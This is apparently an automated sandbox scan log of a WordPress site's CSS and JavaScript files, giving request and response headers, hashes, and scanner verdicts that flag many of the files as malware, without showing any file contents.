biasbd.com/wp-content/themes/industrial/css/bootstrap.css?ver=5.2.16
111.221.45.32 200 OK 12 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/css/bootstrap.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (436)
Hash f8c2609b7304dfba35888623e8f2d469
a38bc6579ed8d4342468797b9e3be82f037226ab
601ab54c2a9091c69b21dfaef6822804e08125a9aeed95c80ff28aa85005ff24
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/css/bootstrap.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Fri, 17 Jun 2016 05:12:56 GMT
etag: "10330-576386d8-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 11527
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/css/pikaday.css?ver=5.2.16
111.221.45.32 200 OK 993 B URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/css/pikaday.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash ac09342cd49d1170e62543496577ba97
6b4dd7faea1f5ea969a916693968653b8f86fb41
a481ff90cb74de04a621bad6defd5fa18354504ee5f770192170cc0fd8025fb3
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/css/pikaday.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Fri, 17 Jun 2016 05:12:56 GMT
etag: "c30-576386d8-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 993
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/css/core.css?ver=5.2.16
111.221.45.32 200 OK 12 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/css/core.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash 345d2979d981025559480456f9c714b7
06c188114984332ed84c39d3bf49b203bf29cc4f
c18022809486759f727ffbeaa668a678e2a07ce986517c5d18d081a853956bd6
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/css/core.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Wed, 23 Jan 2019 01:45:38 GMT
etag: "115db-5c47c742-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 12279
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/css/components/button.css?ver=5.2.16
111.221.45.32 200 OK 793 B URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/css/components/button.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with CRLF line terminators
Hash cbddcd7411ec657b25b64941f09fa381
92d262c5ce23b31af4b21785b5736c8b486822f5
3de374e42ef63fd1f8b60c29837b469cdc69b72722c7ee6db24c39e39101e8eb
GET /wp-content/themes/industrial/css/components/button.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "94b-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 793
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/css/swipebox.css?ver=5.2.16
111.221.45.32 200 OK 1.3 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/css/swipebox.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with CRLF line terminators
Hash b21af63ea6bb174588218500e41938e6
fea019b73568ba3703a0abdb06bd0a4bb618c514
873eb93a3568e7207e74c019cbc3c18e35296c71a668d2dd7662dbc783617200
GET /wp-content/themes/industrial/css/swipebox.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "166e-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 1348
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/style.css?ver=5.2.16
111.221.45.32 200 OK 411 B URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/style.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash 78fa704491160bf404d3e20ececf6c26
0342cc9218380f9fb1bdecffbe28a3e791719a99
b86a1df6ce235bf21a85d0181b439a0f1f1013a31973af4539e415c89941f260
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/style.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Sat, 09 Feb 2019 12:25:42 GMT
etag: "2c8-5c5ec6c6-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 411
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/css/wordpress.css?ver=5.2.16
111.221.45.32 200 OK 696 B URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/css/wordpress.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with CRLF line terminators
Hash 023fbdc82c706162832c4db9b00ffab4
c391c45fb0fd7b3dd9e6fbab0e411c2b3c114de9
3512649c5fba98039b175b1ede193ddc41431590327b48b2e4bc7b55280756ac
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/css/wordpress.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "80b-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 696
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/custom.css?ver=5.2.16
111.221.45.32 200 OK 40 B URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/custom.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with no line terminators
Hash 0df009c205c6595dfa2bd6df220bb49b
9f084f34dda0169577b05c49521e691a1022214a
38e2a843ebc496d80f59e180c384b804bd3034d228b3f1b09dfe7e3e11b2767a
GET /wp-content/themes/industrial/custom.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "28-56dd2758-0;;;"
accept-ranges: bytes
content-length: 40
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/css/components.css?ver=5.2.16
111.221.45.32 200 OK 18 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/css/components.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash 5c0c03646926e8ffa054ab548aabb2ad
a5a3d88f1af1ecd6f9ba1ae1a65c7acf1fca46b9
38b1cccc333d316012486e6a3390ffb3e3fff956d3d3e5cff1716367a3be1610
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/css/components.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Wed, 02 Jan 2019 21:39:26 GMT
etag: "19d14-5c2d2f8e-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 17786
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/newsletter/style.css?ver=6.1.0
111.221.45.32 200 OK 1.2 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/newsletter/style.css?ver=6.1.0
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash eaa017c0514d60af9ba7281e692af7e3
d781a66d9945b12555d2d78ce462a582aaeddb9b
ce6b5e769b94fa9caaef9a1822c0401aa66de94af1a76ea55621fe3650283fe5
GET /wp-content/plugins/newsletter/style.css?ver=6.1.0 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Mon, 01 Jul 2019 18:27:56 GMT
etag: "18c8-5d1a50ac-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 1193
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
111.221.45.32 200 OK 4.0 kB URL HTTP/1.1 biasbd.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (9959)
Hash 2f89b08855471c7476435ce0bec33ba7
970533f152623df03b5fc6fb793b21889e4e0349
d200586b6dd1ff779b6c30947361ff736e076d8c7d502505ab3174ca33455ea0
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: application/x-javascript
last-modified: Fri, 20 May 2016 04:11:28 GMT
etag: "2748-573e8e70-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 4034
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8
111.221.45.32 200 OK 18 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (64614), with CRLF line terminators
Hash d4063405bdeedf677d13c9ce7b535aa1
256f3aed2dfad47a4f42e45356fd9aedb7be1f31
d31e0030358c9ee54256451fd2055125da1d7bd58da7b1ea901aacfe25b84696
GET /wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: application/x-javascript
last-modified: Tue, 25 Dec 2018 05:42:46 GMT
etag: "fdb5-5c21c356-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 18107
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.6.7
111.221.45.32 200 OK 954 B URL HTTP/1.1 biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.6.7
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type HTML document, ASCII text, with very long lines (2637), with no line terminators
Hash e9992160668c7b30e45faf568c416f25
c004dc1d1a4868d6178aa1baac98711ee09c49e5
26ff0f8d7f14ce31d82a41909407ebf2eb0f104f113a5e01892f159e6666bc97
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.6.7 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: application/x-javascript
last-modified: Thu, 10 Mar 2022 19:31:30 GMT
etag: "a4d-622a5212-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 954
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70
111.221.45.32 200 OK 3.5 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (9172)
Hash de329cdce96c17fef9c3516b09ba51c6
664ff401060faaf6770ba30761b367d3aef10a8a
d9f05937cd228acc98f18a5e52ef966e0885afbcbc06d31da2e61e2b3f9e13f4
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: application/x-javascript
last-modified: Thu, 10 Mar 2022 19:31:33 GMT
etag: "255e-622a5215-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 3533
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
111.221.45.32 200 OK 34 kB URL HTTP/1.1 biasbd.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (31997)
Hash 167b4b3aef1415384a1d72a851584464
7edb972190b2048300fb5eb1668e54ec049b91a2
2d29b6f8700dbeda5b83991887d89ef850f3d570946b8eef360a86b9adcb0fb3
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: application/x-javascript
last-modified: Wed, 22 May 2019 05:39:24 GMT
etag: "17a69-5ce4e08c-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 33836
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js?ver=5.5
111.221.45.32 200 OK 355 B URL HTTP/1.1 biasbd.com/wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js?ver=5.5
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash b52dacb498e0baf0cac56cfc1137b634
04b880bf015577604ce2dcc19b9fc0e2c221b31f
884f610a43fadf231d67a53f3c406e0d753366f6e61588f05da6d2f361c6e5fd
GET /wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js?ver=5.5 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Tue, 25 Dec 2018 05:41:34 GMT
etag: "37f-5c21c30e-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 355
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3
111.221.45.32 200 OK 4.0 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash a975a254fbc49a0086a84e624d7f094c
04885e648587650d8782310a9e8056191dbe5411
5033a9e7cefd80eda6878d4fe33c7e3a59f2da9e06a7a74d44961a9d8de4ee20
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 01 Jul 2019 18:27:38 GMT
etag: "3868-5d1a509a-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 3993
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8
111.221.45.32 200 OK 39 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (27287), with CRLF line terminators
Hash da82b93940d18779f96809b863a9f975
a0a731146a6a1a908b24ad04f3c2529dc81d9914
ca73520757002c8e415668ecef09cfca42ac2f8ad6a48d243959a9850855ac55
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: application/x-javascript
last-modified: Tue, 25 Dec 2018 05:42:46 GMT
etag: "1afe4-5c21c356-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 38593
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
111.221.45.32 200 OK 977 B URL HTTP/1.1 biasbd.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (1680)
Hash 60e4ab71992dc241e8f93bdf73199d7c
61fe2f1b6151b2c400f0b32998ce1504cdf2140a
eae30f24f574269c25ef73f888c3513259a8ea233be7cb25166bbc017e8318f0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Thu, 10 Mar 2022 19:31:33 GMT
etag: "736-622a5215-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 977
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8
111.221.45.32 200 OK 9.6 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type Unicode text, UTF-8 text, with very long lines (5178), with CRLF line terminators
Hash 4e1237e14f7156c3761b3aad4eb0fa0e
1a331f7be9045dbb71665b750124c9b59af89091
cedbb7e59f35b504f399b64b12652caadc94d7ea303ffab1f0fa7a46874f20e4
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: text/css
last-modified: Tue, 25 Dec 2018 05:42:44 GMT
etag: "9b46-5c21c354-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 9570
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.3
111.221.45.32 200 OK 657 B URL HTTP/1.1 biasbd.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.3
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash 05693f8e3634eaa294f415f241b633b6
8136e661102dfe848f2ce6bf384b9aba8e2829cc
550c7691a7e68e174472d3b68b3b147e40cdfe90335e9cd441cffeece9f9dfc4
GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.3 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: text/css
last-modified: Mon, 01 Jul 2019 18:27:38 GMT
etag: "695-5d1a509a-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 657
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=5.5
